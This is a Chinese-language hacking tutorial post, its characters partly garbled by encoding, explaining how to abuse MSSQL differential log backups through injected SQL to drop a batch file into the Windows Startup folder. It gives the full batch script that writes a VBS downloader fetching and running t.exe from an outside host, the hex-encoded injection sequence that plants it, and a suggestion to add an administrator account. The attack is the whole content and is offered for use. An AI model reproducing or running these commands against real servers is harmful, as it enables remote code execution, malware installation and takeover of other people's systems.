MSSQL差異備份獲取webshell 幾乎人人皆知,那么我們可以利用差異備份出來(lái)的文件 當(dāng)作惡意代碼
讓系統(tǒng)執(zhí)行了之后自動(dòng)提升權(quán)限 或者添加管理員嗎？ 答案當(dāng)然可以了,kj021320測(cè)試了N次之后跟你說(shuō)！

那么我們得考慮文件擺放的位置~什么地方系統(tǒng)會(huì)運(yùn)行呢？這個(gè)其實(shí)算是廢話吧！
大家不用想都知道 通用地方 C:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)
呵呵位置有了！　那么我們備份什么文件讓系統(tǒng)能執(zhí)行的呢？
這個(gè)是第一個(gè)關(guān)鍵點(diǎn)~！
EXE JS VBS BAT這些文件大家第一時(shí)間想到的了
那些我一個(gè)一個(gè)來(lái)分析 exe的話！絕對(duì)能了！ 但是 MSSQL差異備份這么多垃圾肯定會(huì)把exe弄壞的！
否決掉
然后到腳本
VBS 我們能不能把 他的垃圾信息注釋掉呢？ 不然VBS 會(huì)執(zhí)行不了！ OK 學(xué)過(guò)VBS的朋友都知道
VBS里面 有2種注釋 ' 還有就是 rem
但是還是會(huì)有垃圾信息屏蔽不了
否決掉

JS呢？ JS里面有多行注釋的/**/ 但是 /* 不可能在首行吧？
否決掉

最后 剩下我們最熟悉的bat批處理了！
OK我們繼續(xù)分析 bat里面注釋是什么呢？也是REM,失敗?。≈皏bs那里不行 這里的rem注釋也一樣不行的！
那么我們?cè)趺崔k呢？其實(shí)很簡(jiǎn)單！ 當(dāng)我們?cè)贑MD下面敲錯(cuò)了命令系統(tǒng)會(huì)怎樣呢？

說(shuō)到這里 要是大家不往文章下面看也一樣能想到方法了吧~

OK我們繼續(xù)探~~這里是最最關(guān)鍵點(diǎn),差異備份出來(lái)的垃圾信息我們可以通過(guò)用回車把他提交了！
而系統(tǒng)只當(dāng)作無(wú)用的命令來(lái)處理！不影響我們的操作！
問(wèn)題就這樣解決了嗎？不是的！~MSSQL備份的時(shí)候,到一定的字符長(zhǎng)度就會(huì)出現(xiàn)垃圾的字符,那個(gè)字符會(huì)影響我們的操作！
那么我們得把語(yǔ)句盡量縮少,越少越好~
OK那我們思路好了就采用bat 寫一個(gè)VBS的下載者 然后執(zhí)行這個(gè)下載者 最后通過(guò)下載者down回來(lái)的馬子來(lái)獲取系統(tǒng)權(quán)限
下面是我改過(guò)的生成下載者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs 
echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs
k.vbs
t

下一個(gè)k.VBS然后k.vbs下載一個(gè)t.exe文件保存到本地 直接執(zhí)行
記得記得我說(shuō)過(guò)的代碼前面一定要用回車把垃圾數(shù)據(jù)提交 最好2以上個(gè)回車
然后實(shí)現(xiàn)差異備份

alter database ISTO set RECOVERY FULL--
create table cmd (a image)--
backup log ISTO to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A6563686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A6B2E7662730D0A740D0A)--
backup log ISTO to disk = 'C:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)\1.bat'--
drop table cmd--

OK bat出來(lái)了！ 至于怎樣讓服務(wù)器重啟呢！這個(gè)問(wèn)題遺留給你們?nèi)ビ懻摪桑?
要是服務(wù)器直接開啟了3389 那就更方便了！ 直接bat 一個(gè)添加管理員的命令更爽！

最新評(píng)論